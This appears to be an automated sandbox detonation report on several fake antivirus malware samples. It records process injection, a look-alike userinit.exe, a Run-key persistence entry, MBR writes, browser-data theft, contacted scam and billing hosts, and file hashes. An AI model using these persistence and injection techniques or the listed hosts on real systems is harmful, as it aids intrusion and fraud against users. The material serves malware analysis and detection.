N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A

Suspicious use of UnmapMainImage

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2124 wrote to memory of 1724 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus2010.exe C:\Windows\SysWOW64\cmd.exe
PID 2124 wrote to memory of 1724 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus2010.exe C:\Windows\SysWOW64\cmd.exe
PID 2124 wrote to memory of 1724 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus2010.exe C:\Windows\SysWOW64\cmd.exe
PID 2124 wrote to memory of 1724 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus2010.exe C:\Windows\SysWOW64\cmd.exe
PID 2124 wrote to memory of 1724 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus2010.exe C:\Windows\SysWOW64\cmd.exe
PID 2124 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus2010.exe \??\globalroot\systemroot\system32\usеrinit.exe
PID 2124 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus2010.exe \??\globalroot\systemroot\system32\usеrinit.exe
PID 2124 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus2010.exe \??\globalroot\systemroot\system32\usеrinit.exe
PID 2124 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus2010.exe \??\globalroot\systemroot\system32\usеrinit.exe
PID 3012 wrote to memory of 2520 N/A \??\globalroot\systemroot\system32\usеrinit.exe C:\Windows\system32\svchost.exe
PID 3012 wrote to memory of 2520 N/A \??\globalroot\systemroot\system32\usеrinit.exe C:\Windows\system32\svchost.exe
PID 3012 wrote to memory of 2520 N/A \??\globalroot\systemroot\system32\usеrinit.exe C:\Windows\system32\svchost.exe
PID 3012 wrote to memory of 2520 N/A \??\globalroot\systemroot\system32\usеrinit.exe C:\Windows\system32\svchost.exe
PID 3012 wrote to memory of 2520 N/A \??\globalroot\systemroot\system32\usеrinit.exe C:\Windows\system32\svchost.exe
PID 2520 wrote to memory of 272 N/A C:\Windows\system32\svchost.exe C:\Windows\system32\svchost.exe
PID 336 wrote to memory of 636 N/A N/A C:\Windows\system32\wbem\WMIADAP.EXE
PID 336 wrote to memory of 636 N/A N/A C:\Windows\system32\wbem\WMIADAP.EXE
PID 868 wrote to memory of 636 N/A N/A C:\Windows\system32\wbem\WMIADAP.EXE
PID 868 wrote to memory of 636 N/A N/A C:\Windows\system32\wbem\WMIADAP.EXE
PID 868 wrote to memory of 636 N/A N/A C:\Windows\system32\wbem\WMIADAP.EXE
PID 336 wrote to memory of 1900 N/A N/A C:\Windows\system32\wbem\wmiprvse.exe
PID 336 wrote to memory of 1900 N/A N/A C:\Windows\system32\wbem\wmiprvse.exe
PID 600 wrote to memory of 1900 N/A N/A C:\Windows\system32\wbem\wmiprvse.exe
PID 600 wrote to memory of 1900 N/A N/A C:\Windows\system32\wbem\wmiprvse.exe
PID 600 wrote to memory of 1900 N/A N/A C:\Windows\system32\wbem\wmiprvse.exe
PID 400 wrote to memory of 2668 N/A N/A C:\Program Files\Internet Explorer\iexplore.exe
PID 400 wrote to memory of 2668 N/A N/A C:\Program Files\Internet Explorer\iexplore.exe
PID 2520 wrote to memory of 2668 N/A C:\Windows\system32\svchost.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 2520 wrote to memory of 2668 N/A C:\Windows\system32\svchost.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 2520 wrote to memory of 2668 N/A C:\Windows\system32\svchost.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 400 wrote to memory of 2668 N/A N/A C:\Program Files\Internet Explorer\iexplore.exe
PID 400 wrote to memory of 2668 N/A N/A C:\Program Files\Internet Explorer\iexplore.exe
PID 336 wrote to memory of 2736 N/A N/A C:\Windows\system32\DllHost.exe
PID 600 wrote to memory of 2736 N/A N/A C:\Windows\system32\DllHost.exe
PID 600 wrote to memory of 2736 N/A N/A C:\Windows\system32\DllHost.exe
PID 600 wrote to memory of 2736 N/A N/A C:\Windows\system32\DllHost.exe
PID 400 wrote to memory of 2668 N/A N/A C:\Program Files\Internet Explorer\iexplore.exe
PID 400 wrote to memory of 2792 N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 400 wrote to memory of 2792 N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 400 wrote to memory of 2792 N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 400 wrote to memory of 2792 N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2668 wrote to memory of 2792 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2668 wrote to memory of 2792 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2668 wrote to memory of 2792 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2668 wrote to memory of 2792 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 400 wrote to memory of 2792 N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 400 wrote to memory of 2792 N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 400 wrote to memory of 2668 N/A N/A C:\Program Files\Internet Explorer\iexplore.exe
PID 400 wrote to memory of 2792 N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 400 wrote to memory of 2792 N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 400 wrote to memory of 2792 N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 336 wrote to memory of 848 N/A N/A C:\Windows\system32\DllHost.exe
PID 600 wrote to memory of 848 N/A N/A C:\Windows\system32\DllHost.exe
PID 600 wrote to memory of 848 N/A N/A C:\Windows\system32\DllHost.exe
PID 600 wrote to memory of 848 N/A N/A C:\Windows\system32\DllHost.exe
PID 492 wrote to memory of 2668 N/A N/A C:\Program Files\Internet Explorer\iexplore.exe
PID 492 wrote to memory of 2668 N/A N/A C:\Program Files\Internet Explorer\iexplore.exe
PID 492 wrote to memory of 2668 N/A N/A C:\Program Files\Internet Explorer\iexplore.exe
PID 492 wrote to memory of 2668 N/A N/A C:\Program Files\Internet Explorer\iexplore.exe
PID 492 wrote to memory of 2668 N/A N/A C:\Program Files\Internet Explorer\iexplore.exe
PID 492 wrote to memory of 2668 N/A N/A C:\Program Files\Internet Explorer\iexplore.exe
PID 492 wrote to memory of 2668 N/A N/A C:\Program Files\Internet Explorer\iexplore.exe
PID 492 wrote to memory of 2668 N/A N/A C:\Program Files\Internet Explorer\iexplore.exe
PID 492 wrote to memory of 2668 N/A N/A C:\Program Files\Internet Explorer\iexplore.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy WMI provider

ransomware

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService

C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus2010.exe

"C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus2010.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe"

\??\globalroot\systemroot\system32\usеrinit.exe

/install

C:\Windows\system32\svchost.exe

"C:\Windows\system32\svchost.exe"

C:\Windows\system32\wbem\WMIADAP.EXE

wmiadap.exe /F /T /R

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -Embedding

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://secure.2010billing.com/purchase/get.php?i=antvir&advert=3&extern=4&lang=EN

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2668 CREDAT:275457 /prefetch:2

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}

Network

Country Destination Domain Proto
US 168.156.42.60:80 tcp
US 168.156.42.60:80 tcp
US 168.156.42.60:80 tcp
US 168.156.42.60:80 tcp
US 8.8.8.8:53 www.yahoo.com udp
GB 87.248.114.11:80 www.yahoo.com tcp
NL 88.208.21.219:8083 tcp
US 8.8.8.8:53 secure.2010billing.com udp

Files

memory/2124-1-0x0000000000400000-0x00000000004C4400-memory.dmp

memory/2124-2-0x0000000000630000-0x0000000000830000-memory.dmp

\Windows\System32\usеrinit.exe

MD5 4acd14244d2cd76d06939163127cfb10
SHA1 75f3e3c764f7d20c9950f5410f753f3210bcc2e7
SHA256 29b5b65a1cdf119ac7c6c9df76c6843b25a81bd00aa5a5e995ec675e34bf1acb
SHA512 001504da15c1825102479ba379b0be7ec15e779626d450d9d763552d7e1ac71f5bb86110f9361363bd401aabc53cdfd2d554480aec8bef85ed8c7b03cebf4031

\systemroot\system32\msiavjyv.dll

MD5 7943d251821ca441924f0d64946e8a3d
SHA1 cace099a490410260802ee143f7c7e3543f2f4cf
SHA256 be8dbcb59c3181ec518a6934931efc725a128310956fd076f0f0bd537b96a9eb
SHA512 0d4c9f021e07e2a27f3e7f46be591f01ec4c04fce98d9c177697ea4518d0c8d80105d73a29deff925cf28fce89a4fe40e790ef0086748dc169b1a8190e6d40f9

memory/2124-9-0x0000000000400000-0x00000000004C4400-memory.dmp

memory/2520-14-0x00000000000A0000-0x00000000000BA000-memory.dmp

memory/2520-20-0x00000000000A0000-0x00000000000BA000-memory.dmp

memory/2520-15-0x0000000000060000-0x0000000000077000-memory.dmp

memory/2520-25-0x00000000000A0000-0x00000000000BA000-memory.dmp

memory/2520-30-0x00000000000A0000-0x00000000000BA000-memory.dmp

memory/272-32-0x0000000000F30000-0x0000000000F33000-memory.dmp

memory/272-37-0x0000000000F50000-0x0000000000F56000-memory.dmp

memory/272-41-0x0000000000F50000-0x0000000000F56000-memory.dmp

memory/272-33-0x0000000000F50000-0x0000000000F56000-memory.dmp

memory/272-42-0x0000000000060000-0x0000000000077000-memory.dmp

memory/2520-55-0x000007FFFFF80000-0x000007FFFFF90000-memory.dmp

memory/2520-63-0x00000000000A0000-0x00000000000BA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\{E9C1E0AC-C9B1-4c85-94DE-9C1518918D02}.tlb

MD5 63881935b6ff930a39df13a27c18c3f5
SHA1 d5464ca24d61b2efb562b1b4f4e0bef69c94cf04
SHA256 50d712b007a3339855619a4ad283661c07e13ec0a74465ea3d121439005cd1e5
SHA512 011d0307d088ac7a691ff504f8c3e99a06097fc27e10d40d62721cf6c6d0500120d040a7d32fd10aa50aeef1ef12be67501fff122bed129a354fb57c213a0ed9

C:\Windows\System32\exefile.exe

MD5 72178bb0f9674f0ce0b6b188d1219266
SHA1 ae3c43c7846c0ef977fa90991e1c366e34ab671c
SHA256 09cd3c864182b703a1384a15e60424c0ee8c82c3fd19f197c391a0e3ec5bd16e
SHA512 d9004c1b8402375c92690525f06ae83198bb929bb18dfc46fda9036a4054ed9c38637438b13ecc2566f98f2a8ac297ec7f0151b63a59c4f7bbc2ab8f7b6d779e

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx

MD5 aef9e26239afcb4b33a86a2fa1d7c6cd
SHA1 9d7d776bff2ad58b4d779abdb6e9e95762240db8
SHA256 2d17533cf49cc30e382b259be3cfd2ed2a65d7d8919705fcde6eda818cb7caf0
SHA512 52ab2b4a2eff04921b0c482e98c6d490bb9f112efbdf254b87f5740d93754225643b5feac4ab98a25517aac7502f3bb7a95b14be91f110cc0bf251bda6170ea5

memory/272-123-0x0000000000060000-0x0000000000077000-memory.dmp

memory/2520-280-0x00000000000A0000-0x00000000000BA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\CabB696.tmp

MD5 ac05d27423a85adc1622c714f2cb6184
SHA1 b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256 c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA512 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

C:\Users\Admin\AppData\Local\Temp\CabB7B0.tmp

MD5 753df6889fd7410a2e9fe333da83a429
SHA1 3c425f16e8267186061dd48ac1c77c122962456e
SHA256 b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78
SHA512 9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444

C:\Users\Admin\AppData\Local\Temp\TarB7D5.tmp

MD5 dd73cead4b93366cf3465c8cd32e2796
SHA1 74546226dfe9ceb8184651e920d1dbfb432b314e
SHA256 a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22
SHA512 ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 33b3d0956cf1e67f6d99e50ff9ca4b72
SHA1 fc4acb2a82d5a3d3df7834de145748276305e2ae
SHA256 b3443acda6dc4679b02eb78011a6abdc9b430be0af87ee16dceeb3caf29f9791
SHA512 f201a105f5d2d4b3ba8c7d905fc290709d93fd2c8b1076fc5b66e803b89d4aa1e2ae64daba022f2473fc089e47d391edf7bdbaa43a36aae27d43345a0df0a619

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 e8c8ad26e9f11b8928694bb2d6c6d94a
SHA1 32bfe7b01b90260cf7ac4e527544db21a18e2d77
SHA256 59df0721e4d7a01968a277611b7c87b9f90de375ed49e292b4f4e52d5a8b1c9a
SHA512 491d6c4bf7eccbe90222d167e8b381c7932f77ec4f66bccf41dc9a229bd8b356cd43e3ff848e3e9b86fc74d13f58d12f9346686474240ad7af6bff98aae376ee

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 960fd6e3c4cdc6b807d17f5183771629
SHA1 0b9411a227592040fc7fab84ba09c0bef1af1b47
SHA256 77faa62106444cd9b4ab805fa8090ee361d96fe76ac37cdd6f82da2c089e83e5
SHA512 952ac212ac701a0bb560a4fff46874ed073ba1212883dab76f4cd2a753ddededda9b13c0f12420dfd42f9e24dc4cb9fea7232342506ca18f35afaa5d16afa1a0

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 562bd3326b44ef8ff5b8a8dafdbcd71d
SHA1 dc5d49d3aa18f7f4b2455e8c66521a88dff16865
SHA256 6b61aafb816689db87e5623d5f125db9784b40cb65c3b390f99ab39562dd7cec
SHA512 cd766785b3d0d0a7d63de54a030b70a281d35a7e05c6cc65e766ddfe132c33020281ad8f745327fe14886be55317fe1cbe70270865890cb49b562be2adb60fa4

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 525a799223225fc1377353ffa8d8bcd1
SHA1 0c0d1dafc844b63d820672f8967586d00a6159e6
SHA256 d8ab6a245af1599728c4c753bc8031e478dfce26e5f0c6738503e994d2243867
SHA512 ac63dcf10dfb07f9b54d92859d492db79d90096bb50791a6b5a37f1f7b83550e74c535920dd3270e19222f63b9784ce8c8b6dc4fb496214d1b532e618b352372

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 c841051abe33a26f148bc8761b145c39
SHA1 1dbce39d749d88715f6acab03a5a83a9e211e9f4
SHA256 6e4e6863335ddcf5978e01482cd0798f325c43c2fa9cf09e5b6e2415004857da
SHA512 bdb62c311205ead009484111babaa0426b05daf4e09bbe5e33784dce95d9a4fea55e3eef17b8e6cee2b1ec713e83de92bd9f3ced1882693c7085a3b298d64089

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 5356c799e535e8b9604d68074c5450da
SHA1 d49b6455fccdd16782da8c6bd100843e2b422032
SHA256 63f7c6561009827c552948ed158caa23ad70e3c4047f59b3575272638c97723b
SHA512 8132ec1b5adc24431f59d824768b8459fd3d507d4c8580b7c7935f5fe795ebec7d6065c809a3a3ef265314c917965b0a910bc0a7ae529a7d8f3421b53e1626db

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 194a573050f71559bcd63ec8393f4032
SHA1 f63c29991b040840046ad7ac3e59620c10382fb0
SHA256 4c203b1bd151eb4a9ba6b74877f304fa5b2ba7a8d0b86bad8fb32cf950a22b08
SHA512 aa547eac5c2355f3a21872e1878aedd7418cb885d6c0cc94cc9e229a7ff5e6ac88dcaf914bd6ec508789f45329de00e595d2b296f59df78deaac164e5c445f4f

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 23a73bf5863c72733dd8cfe5708e6e27
SHA1 badff23e7692a5d227932d1923b76ea6614844f4
SHA256 41abd4255977c86e552cf7f66e100fe2c52c7694d5c69527090138f147d79fb0
SHA512 1c83768a68b6e09abccb639c1590273266f0af8d7db0cfcf5bd81c77673fd9ab62a02a58416d27fafb6a38e1fb5158722c696d0636a658608cc05a26d5a66013

Analysis: behavioral12

Detonation Overview

Submitted

2024-03-02 22:34

Reported

2024-03-02 22:38

Platform

win10v2004-20240226-en

Max time kernel

142s

Max time network

114s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe"

Signatures

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AntiVirus Pro 2017 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Fake AV\\AntivirusPro2017.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe N/A
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe N/A
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe N/A
File opened (read-only) \??\Y: C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe N/A
File opened (read-only) \??\Q: C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe N/A
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe N/A
File opened (read-only) \??\H: C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe N/A
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe N/A
File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe N/A

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PhysicalDrive0 C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe N/A

Enumerates physical storage devices

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe

"C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 4.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 173.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 114.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 79.121.231.20.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 140.71.91.104.in-addr.arpa udp
US 8.8.8.8:53 twinkcam.net udp
US 103.224.212.215:80 twinkcam.net tcp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 ww25.twinkcam.net udp
US 199.59.243.225:80 ww25.twinkcam.net tcp
US 8.8.8.8:53 225.243.59.199.in-addr.arpa udp
US 8.8.8.8:53 215.212.224.103.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp

Files

memory/3692-0-0x0000000000400000-0x0000000000A06000-memory.dmp

memory/3692-1-0x0000000000400000-0x0000000000A06000-memory.dmp

memory/3692-3-0x0000000000BA0000-0x0000000000BA1000-memory.dmp

memory/3692-4-0x0000000000400000-0x0000000000A06000-memory.dmp

memory/3692-5-0x0000000000400000-0x0000000000A06000-memory.dmp

memory/3692-6-0x00000000028F0000-0x00000000028F1000-memory.dmp

memory/3692-7-0x0000000000400000-0x0000000000A06000-memory.dmp

memory/3692-8-0x0000000000400000-0x0000000000A06000-memory.dmp

memory/3692-9-0x0000000000400000-0x0000000000A06000-memory.dmp

memory/3692-10-0x0000000000400000-0x0000000000A06000-memory.dmp

memory/3692-11-0x0000000000400000-0x0000000000A06000-memory.dmp

memory/3692-12-0x00000000028F0000-0x00000000028F1000-memory.dmp

memory/3692-13-0x0000000000400000-0x0000000000A06000-memory.dmp

memory/3692-14-0x0000000000400000-0x0000000000A06000-memory.dmp

memory/3692-15-0x0000000000400000-0x0000000000A06000-memory.dmp

memory/3692-16-0x0000000000400000-0x0000000000A06000-memory.dmp

memory/3692-17-0x0000000000400000-0x0000000000A06000-memory.dmp

memory/3692-18-0x0000000000400000-0x0000000000A06000-memory.dmp

memory/3692-19-0x0000000000400000-0x0000000000A06000-memory.dmp

Analysis: behavioral22

Detonation Overview

Submitted

2024-03-02 22:34

Reported

2024-03-02 22:39

Platform

win10v2004-20240226-en

Max time kernel

113s

Max time network

145s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Fake AV\HappyAntivirus.exe"

Signatures

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: 33 N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\AUDIODG.EXE N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\HappyAntivirus.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\HappyAntivirus.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Fake AV\HappyAntivirus.exe

"C:\Users\Admin\AppData\Local\Temp\Fake AV\HappyAntivirus.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3880 --field-trial-handle=2228,i,521073434451423547,2311651514500527526,262144 --variations-seed-version /prefetch:8

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x4f8 0x2ec

Network

Country Destination Domain Proto
US 20.231.121.79:80 tcp
US 8.8.8.8:53 68.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 140.71.91.104.in-addr.arpa udp
US 13.107.246.64:443 tcp
US 8.8.8.8:53 194.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
GB 216.58.212.234:443 chromewebstore.googleapis.com tcp
US 8.8.8.8:53 234.212.58.216.in-addr.arpa udp

Files

memory/492-1-0x0000000000BA0000-0x0000000000D92000-memory.dmp

memory/492-0-0x00000000753A0000-0x0000000075B50000-memory.dmp

memory/492-2-0x0000000005780000-0x000000000581C000-memory.dmp

memory/492-3-0x0000000005DD0000-0x0000000006374000-memory.dmp

memory/492-4-0x00000000058C0000-0x0000000005952000-memory.dmp

memory/492-5-0x0000000005760000-0x0000000005770000-memory.dmp

memory/492-6-0x0000000005830000-0x000000000583A000-memory.dmp

memory/492-7-0x0000000005A80000-0x0000000005AD6000-memory.dmp

memory/492-8-0x0000000005760000-0x0000000005770000-memory.dmp

